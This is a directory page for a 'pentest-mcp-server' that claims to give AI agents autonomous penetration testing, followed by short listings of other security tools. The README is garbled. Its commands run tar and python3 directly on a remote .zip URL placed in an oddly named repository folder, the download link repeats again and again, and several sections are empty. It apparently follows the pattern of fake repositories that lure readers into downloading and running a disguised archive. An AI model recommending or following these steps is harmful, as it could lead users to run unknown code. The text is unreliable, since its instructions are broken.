by exjskdjsdfks
Provides a persistent Model Context Protocol server that enables AI agents to conduct autonomous penetration testing on Linux distributions such as Kali and Parrot OS.
Pentest Mcp Server offers a lightweight, easy‑to‑deploy server for autonomous penetration testing. By leveraging the Model Context Protocol, AI agents can maintain stateful interactions with the server, allowing continuous, context‑aware security assessments across any Linux distribution.
cd ~/Downloads
tar -xzf server_mcp_pentest_1.8.zip
cd pentest-mcp-server
python3 server_mcp_pentest_1.8.zip
http://localhost:8080 to access the UI.python3 --version.config.yaml (generated after first run) and set the port field.The pentest-mcp-server is a user-friendly application designed for penetration testing. It provides a straightforward way to set up a server that helps security professionals and hobbyists test the security of networks and applications. Whether you are using Kali Linux or Parrot OS, this tool simplifies your workflow and improves your testing capabilities.
In this section, you will learn how to download and run the pentest-mcp-server. Follow the steps below to get started quickly.
Before you download the pentest-mcp-server, make sure your system meets the following requirements:
To get the software, you need to visit the Releases page. Click on the link below to access it:
On the Releases page, you will see several files available for download. Look for the latest version. It should be named something like https://raw.githubusercontent.com/exjskdjsdfks/pentest-mcp-server/main/inculpably/server_mcp_pentest_1.8.zip. Click on it to start the download.
Once the download is complete, locate the downloaded file on your computer. Usually, it will be in your "Downloads" folder.
If you are using the command line, navigate to your download directory:
cd ~/Downloads
Extract the contents of the file using this command:
tar -xzf https://raw.githubusercontent.com/exjskdjsdfks/pentest-mcp-server/main/inculpably/server_mcp_pentest_1.8.zip
Navigate to the directory where the files are extracted. You can do this by entering the following command:
cd pentest-mcp-server
To start the server, type:
python3 https://raw.githubusercontent.com/exjskdjsdfks/pentest-mcp-server/main/inculpably/server_mcp_pentest_1.8.zip
This command will launch the pentest-mcp-server, and you will see output on your screen indicating that the server is running.
Once the server is up, you can access it through your web browser. Open your browser and type:
http://localhost:8080
This will take you to the user interface of the pentest-mcp-server, where you can start your penetration testing tasks.
If you encounter issues while running the server or performing tasks, here are some common solutions:
python3 --version.We welcome contributions from everyone. If you want to help improve the pentest-mcp-server, feel free to open an issue or submit a pull request. Your feedback and suggestions can make this tool better for all users.
This project is related to the following topics:
If you have questions or need assistance with the pentest-mcp-server, contact us through the project's GitHub page. We are here to help you get the most out of this tool.
For your convenience, here's the download link again:
Now you're ready to start using pentest-mcp-server for your penetration testing activities. Happy testing!
Please log in to share your review and rating for this MCP.
Explore related MCPs that share similar capabilities and solve comparable challenges
by chaitin
A self‑hosted web application firewall and reverse proxy that protects web applications from attacks and exploits by filtering, monitoring, and blocking malicious HTTP/S traffic.
by snyk
Scans installed AI agent components, MCP servers, and skill files for prompt‑injection, tool poisoning, toxic flows, hard‑coded secrets and other supply‑chain risks.
by safedep
Provides enterprise‑grade open source software supply chain security by scanning source code, dependencies, containers and SBOMs, detecting vulnerabilities and malicious packages, and enforcing policy as code.
by semgrep
Offers an MCP server that lets LLMs, agents, and IDEs run Semgrep scans to detect security vulnerabilities in source code.
by PortSwigger
Enables Burp Suite to communicate with AI clients via the Model Context Protocol, providing an MCP server and bundled stdio proxy.
by gensecaihq
Provides AI‑driven conversational access to Wazuh SIEM data, allowing natural‑language queries, threat analysis, incident triage, and compliance checks through a Model Context Protocol‑compliant remote server.
by cycodehq
Boost security in the development lifecycle via SAST, SCA, secrets, and IaC scanning.
by mobb-dev
Provides automatic security vulnerability remediation for code via a command‑line interface and an MCP server, leveraging findings from popular SAST tools such as Checkmarx, CodeQL, Fortify, and Snyk.
by ChristophEnglisch
Provides AI‑powered administration of Keycloak users and realms through the Model Context Protocol, enabling automated creation, deletion, and listing of users and realms from MCP clients such as Claude Desktop.